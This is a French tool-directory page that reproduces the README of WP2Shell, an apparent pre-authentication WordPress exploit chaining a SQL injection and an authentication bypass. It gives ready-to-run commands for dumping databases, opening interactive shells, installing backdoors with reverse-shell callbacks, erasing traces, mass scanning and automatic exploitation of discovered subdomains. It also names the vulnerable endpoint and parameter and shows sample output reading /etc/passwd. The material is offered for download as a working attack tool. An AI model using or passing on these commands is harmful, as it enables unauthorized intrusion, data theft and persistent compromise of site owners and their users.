Skip to content
KitploitKITPLOIT
OutilsExploitsBlog
Log in
Soumettre
OutilsExploitsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
WP2Shell — Framework modulaire d'exploitation WordPress pré-authentification enchaînant injection SQL et contournement d'authentification pour fournir exécution de code à distance, shells interactifs, portes dérobées et analyse de vulnérabilités à grande échelle. | Kitploit
Outils/GitHubGitHub/g0d150ne/wp2shell
Frameworks de Tests d'IntrusionReconnaissanceScanners de VulnérabilitésFrameworks d'ExploitationMécanismes de PersistanceExploitationExploitation d'Applications WebContournement de WAFOutil d'Accès à DistanceDéveloppement de Charges Utiles
1127il y a 1 moisPas encore vérifié
GitHub
g0d150ne/wp2shell

WP2Shell

Framework modulaire d'exploitation WordPress pré-authentification enchaînant injection SQL et contournement d'authentification pour fournir exécution de code à distance, shells interactifs, portes dérobées et analyse de vulnérabilités à grande échelle.

Voir le dépôt

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

WP2Shell - Exploit RCE pré-authentification WordPress

CVE-2026-63030 + CVE-2026-60137
Version : 4.0.0
Auteur : G0D150NE

📌 Aperçu

WP2Shell est un outil d'exploitation en chaîne complète pour l'exécution de code à distance pré-authentification WordPress. Il combine deux vulnérabilités critiques :

  • CVE-2026-63030 - Injection SQL dans le endpoint Batch de l'API REST
  • CVE-2026-60137 - Contournement d'authentification via l'empoisonnement du cache oEmbed

Cet outil permet de compromettre entièrement les installations WordPress vulnérables sans aucune authentification - de la détection jusqu'au RCE complet et à la persistance.

⚡ Fonctionnalités

  • 🔍 Vérification non destructive - Confirmation sûre de la vulnérabilité
  • 📊 Extraction multi-techniques - UNION, basée sur les erreurs, SQLi aveugle
  • 🚀 Chaîne RCE complète - De l'injection SQL à la création de compte administrateur
  • 🐚 Déploiement de webshell - Backdoor dissimulée basée sur un plugin
  • 🧹 Capacité de nettoyage - Supprimer toutes les traces
  • 📡 Scan de masse - Scanner multithread pour plusieurs cibles
  • 🤖 Mode Autopwn - Découverte de sous-domaines + exploitation automatique
  • 🌐 Rotation de proxys - Prise en charge des proxys rotatifs
  • 🕵️ Mode furtif - Délais aléatoires et techniques de contournement WAF

🔧 Installation

# Clone repository
git clone https://github.com/g0d150ne/wp2shell.git
cd wp2shell

# No dependencies needed - uses Python 3.8+ standard library
chmod +x wp2shell.py

🎯 Utilisation

Structure des commandes

python3 wp2shell.py [COMMAND] [OPTIONS] [TARGET]

Commandes disponibles

CommandeDescription
checkConfirmation de vulnérabilité non destructive
readExtraire des données via injection SQL
exploitChaîne RCE complète pré-auth
shellDéployer un webshell avec des identifiants existants
masscanScanner en masse plusieurs cibles
autopwnDécouverte automatique → scan → exploitation

🚀 Exemples

1. Vérification de vulnérabilité

python3 wp2shell.py check https://target.com
python3 wp2shell.py check https://target.com --confirm-timing --sleep 5

2. Extraction de données

Empreinte de base :

python3 wp2shell.py read https://target.com

Extraire les utilisateurs :

python3 wp2shell.py read https://target.com --preset users

Requête personnalisée :

python3 wp2shell.py read https://target.com --query "SELECT @@version"

Dumper la base de données entière :

python3 wp2shell.py read https://target.com --preset dumpall --max-length 4096

3. Exploitation complète

Exploitation de base :

python3 wp2shell.py exploit https://target.com

Exploitation avec shell interactif :

python3 wp2shell.py exploit https://target.com --interactive

Exploitation avec installation de backdoor :

python3 wp2shell.py exploit https://target.com --backdoor --lhost 192.168.1.100 --lport 4444

Exploitation avec dump de la base de données :

python3 wp2shell.py exploit https://target.com --dumpdb

Exploitation avec nettoyage (suppression des traces) :

python3 wp2shell.py exploit https://target.com --cleanup

4. Utilisation d'identifiants administrateur existants

python3 wp2shell.py shell https://target.com --user admin --password secret123 --interactive
python3 wp2shell.py shell https://target.com --user admin --password secret123 --command "whoami"

5. Scan de masse

# Create targets file
echo "https://target1.com" > targets.txt
echo "https://target2.com" >> targets.txt

# Scan with 50 threads
python3 wp2shell.py masscan --file targets.txt --threads 50 --output results.csv

6. Mode Autopwn (Automatisation complète)

python3 wp2shell.py autopwn --domain example.com --lhost 192.168.1.100

Ceci va :

  1. Découvrir les sous-domaines via crt.sh
  2. Identifier les installations WordPress
  3. Exploiter tous les sites vulnérables
  4. Installer des backdoors sur les cibles compromises

🎮 Shell interactif

Après l'exploitation, vous obtenez un shell interactif complet :

python3 wp2shell.py exploit https://target.com -i
[*] Interactive shell — type 'exit' to quit
/var/www/html $ id
uid=33(www-data) gid=33(www-data)
/var/www/html $ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
...
/var/www/html $ exit

🛡️ Référence des options

Options courantes

OptionDescription
--timeoutDélai d'expiration HTTP en secondes (défaut : 30)
--proxiesListe de proxys séparés par des virgules (ex. : http://127.0.0.1:8080)
--stealthActiver le mode furtif avec des délais aléatoires
-v, --verboseActiver la sortie de débogage
-q, --quietSupprimer la bannière et les messages d'information

Options de la commande read

OptionDescription
--prefixPréfixe de table (défaut : wp_)
--auto-prefixDécouverte automatique du préfixe de table
--max-lengthNombre maximal de caractères par valeur (défaut : 128)
--techniqueTechnique d'extraction : auto/union/error/blind
--presetPréréglage de données : fingerprint/users/dumpall
--queryExpression SQL arbitraire à extraire

Options de la commande exploit

OptionDescription
--prefixPréfixe de table (défaut : wp_)
--no-discoverIgnorer la découverte automatique, utiliser les valeurs par défaut
-i, --interactiveOuvre un shell après l'exploitation
-c, --commandExécuter une commande unique après l'exploitation
--backdoorInstaller une backdoor de persistance
--lhostLHOST pour le shell inversé (défaut : 10.0.0.1)
--lportLPORT pour le shell inversé (défaut : 4444)
--dumpdbDumper la base de données après l'exploitation
--cleanupSupprimer l'utilisateur créé et le webshell à la sortie

🔬 Détails techniques

Chaîne de vulnérabilités

  1. Injection SQL (CVE-2026-63030)

    • Se produit dans le endpoint /wp-json/batch/v1
    • Le paramètre author_exclude est vulnérable à une injection SQL aveugle temporelle
    • Permet l'extraction par UNION et basée sur les erreurs
  2. Contournement d'authentification (CVE-2026-60137)

    • Empoisonnement du cache oEmbed via le paramètre /_embed
    • Permet de créer des utilisateurs administrateurs via le changeset du customizer
    • Déclenche une chaîne de ré-entrée pour la création de comptes privilégiés

Versions WordPress prises en charge

VersionStatut
6.9.0✅ Vulnérable
6.9.1✅ Vulnérable
6.9.2✅ Vulnérable
6.9.3✅ Vulnérable
6.9.4✅ Vulnérable
7.0.0✅ Vulnérable
7.0.1✅ Vulnérable
≥ 7.0.2❌ Corrigé

Techniques d'extraction

TechniqueVitesseTaille des donnéesExigences
UNION⚡ Très rapideIllimitéeLa cible ne doit pas filtrer UNION
Error🚀 Rapide~30 caractères/reqLa cible doit exposer les messages d'erreur
Blind🐢 LenteIllimitéeOracle booléen disponible

📊 Exemples de sortie

Exploitation réussie

░▒▓█▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓███████▓▒░▒▓███████▓▒░ ░▒▓███████▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓████████▓▒░▒▓█▓▒░      ░▒▓█▓▒░        
                                                                                                                                                                                                                            
  CVE-2026-63030 + CVE-2026-60137
  WordPress Pre-Auth RCE  [v4.0.0]
  + G0D150NE
Télécharger l’outil